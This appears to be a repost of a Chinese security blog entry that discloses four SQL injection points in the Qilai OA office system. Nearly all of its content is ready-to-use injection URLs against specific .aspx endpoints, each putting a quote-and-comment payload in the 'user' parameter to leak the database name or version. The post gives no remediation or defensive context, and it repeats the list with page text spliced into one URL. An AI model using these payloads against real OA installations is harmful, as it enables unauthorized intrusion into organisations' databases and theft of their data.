启莱OA系统sql注入4处

没穿底裤
没穿底裤
没穿底裤
714
文章
0
评论
2020年1月1日03:22:51评论1,312 views字数 335阅读1分7秒阅读模式
摘要

注入一
访问
http://test.oawin.net:5656/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1

注入二
访问
http://test.oawin.net:5656/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1

注入三
访问
http://test.oawin.net:5656/client/GetUser.aspx?user=' and @@version>0--

注入四
访问
http://test.oawin.net:5656/client/CloseMsg.aspx?user=' and @@version>0--&

注入一
访问
http://test.oawin.net:5656/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1
启莱OA系统sql注入4处
注入二
访问
http://test.oawin.net:5656/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1
启莱OA系统sql注入4处
注入三
访问
http://test.oawin.net:5656/client/GetUser.aspx?user=' and @@version>0--
启莱OA系统sql注入4处
注入四
访问
http://test.oawin.net:5656/client/CloseMsg.aspx?user=' and @@version>0--&启莱OA系统sql注入4处

启莱OA系统sql注入4处pwd=a

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日03:22:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   启莱OA系统sql注入4处https://cn-sec.com/archives/76449.html

发表评论

匿名网友 填写信息